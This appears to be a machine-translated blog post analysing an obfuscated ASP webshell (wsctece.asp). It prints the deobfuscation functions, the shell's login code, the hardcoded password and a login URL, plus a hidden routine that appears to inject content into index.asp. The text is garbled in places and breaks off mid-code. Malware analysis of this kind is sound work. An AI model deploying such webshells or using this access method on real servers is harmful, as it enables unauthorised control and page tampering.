Full Analysis on decryption, use and backdoor functions of wsctece. asp from t00ls

From Kingdee blog

How to Use the asp webshell from t00ls.

The premise of shell analysis is that the shell must be in plain text, so we should decrypt the webshell first.

This is a typical example of using thirteen reverse encryption, and a function is mutating to increase the difficulty of recognition.

First, pull wsctece. asp into the tool.
First, check the decryption of the first function zznFun.
Function zznFun (zznObjstr): zznObjstr = Replace (zznObjstr, "③", "): For zznI = 1 To Len (zznObjstr): If Mid (zznObjstr, zznI, 1) <> "1" Then: zznNewStr = Mid (zznObjstr, zznI, 1) & zznNewStr: Else: zznNewStr = vbCrLf & zznNewStr: End If: Next: zznFun = zznNewStr: end Function
13 reverse Functions

We can see that this function has two encryption points. Save as shellcode. asp

Let's look at another function, UZSS, which is also named 13 reverse encryption. Pull shellcode. asp into the tool.

This function is encrypted in many places, with 23 points. Save the result as shellcode1.asp. Now let's take a look at the Xo function.
Program code
Function Xo (e): e = R (e, "random", Chr (34): For psI = 1 To Len (e): If Mid (e, psI, 1) <> "inherit" Then: XoX = Mid (e, psI, 1) & XoX: Else: XoX = vbCrlf & XoX: End If: Next: Xo = XoX: end Function
We can see that she also called function R and searched for this function. The Code is as follows:
Program code
Function R (a, B, c): R = Replace (a, B, c): End Function

It is a replacement statement. The Chr (34) character is ", so the R content is substituted into the Xo, then the XO function code is
Program code
Function Xo (e): e = Replace (e, "random", Chr (34): For psI = 1 To Len (e): If Mid (e, psI, 1) <> "inherit" Then: XoX = Mid (e, psI, 1) & XoX: Else: XoX = vbCrlf & XoX: End If: Next: Xo = XoX: end Function

This is very bright, and he is also the inverse function of thirteen. The decryption is as follows:

Stored as shellcode2.asp. In fact, this function is very important for encryption and will be analyzed later.

The shell decryption is complete.

Let's take a look at the usage.

Go up to shellcode2.asp and search for userpass or session. The most accurate way to find a shell logon location is to find the location of the session.

After searching for a session, we will find such a piece of code.
Program code
If session ("webc0fig") <> UserPass then
If request ("ps0") <> "then
If request ("ps0") = UserPass and StrReverse (Replace (Request. ServerVariables ("SERVER_NAME"), ".", "") = Request ("c") then

A = trim (request (""))
T = trim (request ("t "))
P = WWWRoot & p

If a <> "" and t <> "" then
W (0)
Response. End ()

Function w (zo)
On Error Resume Next
If t = 1 then
B = s
C = a & s
If instr (M (p, z) (1), s) = 0 Then V (M (p, z) (1) & a, p, z) (1)
Else
B =
C = ""
End if

If V (R (M (p, z) (1), B, c), p, z) (1) then RRS ""
If Err. Number = 0 Then
RRS "00"
Else
RRS Err. Description
End if
Err. Clear)
End function
End if

Session ("webc0fig") = UserPass
Session ("idx") = 2
Session ("FolderPath") = ""
Response. redirect url
Else
Response. End ()
End if

The above two functions are the last encryption function Xo encrypted content.

To facilitate the removal of the above two functions, sort out the code.

Program code
If Session ("webc0fig") <> UserPass Then
If request ("ps0") <> "Then
If request ("ps0") = UserPass And StrReverse (Replace (request. ServerVariables ("SERVER_NAME"), ".", "") = request ("c") Then

A = Trim (request (""))
T = Trim (request ("t "))
P = WWWRoot & p
If a <> "" And t <> "" Then
W (0)
Response. End ()
End If
Session ("webc0fig") = UserPass
Session ("idx") = 2
Session ("FolderPath") = ""
Response. redirect url
Else
Response. End ()
End If

This part of the code is the shell login processing code, you can see that only when request ("ps0") = UserPass and StrReverse (Replace (request. serverVariables ("SERVER_NAME "),". "," ") = request (" c.
We search userpass, which can be found at the end of the file.
Program code
Sub ps (): z = "GB2312": UserPass = "0dlm1c1gi0hr": s = "</body>": p = "index. asp": end sub
We can see that the password is 0dlm1c1gi0hr. This process is very important and is the basic function for subsequent analysis.
What is StrReverse (Replace (request. ServerVariables ("SERVER_NAME? Is to remove the domain name ".", and then reverse.

For example, www.daokers.com is mocsrekoadwww. Now, the shell is used as follows:
Take local running as an example: http: // localhost/shellcode2.asp? Ps0 = 0dlm1c1gi0hr & c = tsohlacol
In this way, the interface is displayed.

 

For more information, see the following.

When a login page is successful and the session is assigned a value, the task is completed obviously, but here we can see that there is one more thing.
Program code
If a <> "" And t <> "" Then
W (0)
Response. End ()
End If

In addition, there is a related function W, which involves two other functions V and function M. These two functions are located at the beginning of the file, and we will call them, at the same time, place the code of function W outside the if judgment statement.
After this adjustment, the code is
Program code
If Session ("webc0fig") <> UserPass Then
If Request ("ps0") <> "Then
If Request ("ps0") = UserPass And StrReverse (Replace (Request. ServerVariables ("SERVER_NAME"), ".", "") = Request ("c") Then
A = Trim (Request (""))
T = Trim (Request ("t "))
P = WWWRoot & p
If a <> "" And t <> "" Then
W (0)
Response. End ()
End If
Session ("webc0fig") = UserPass
Session ("idx") = 2
Session ("FolderPath") = ""
Response.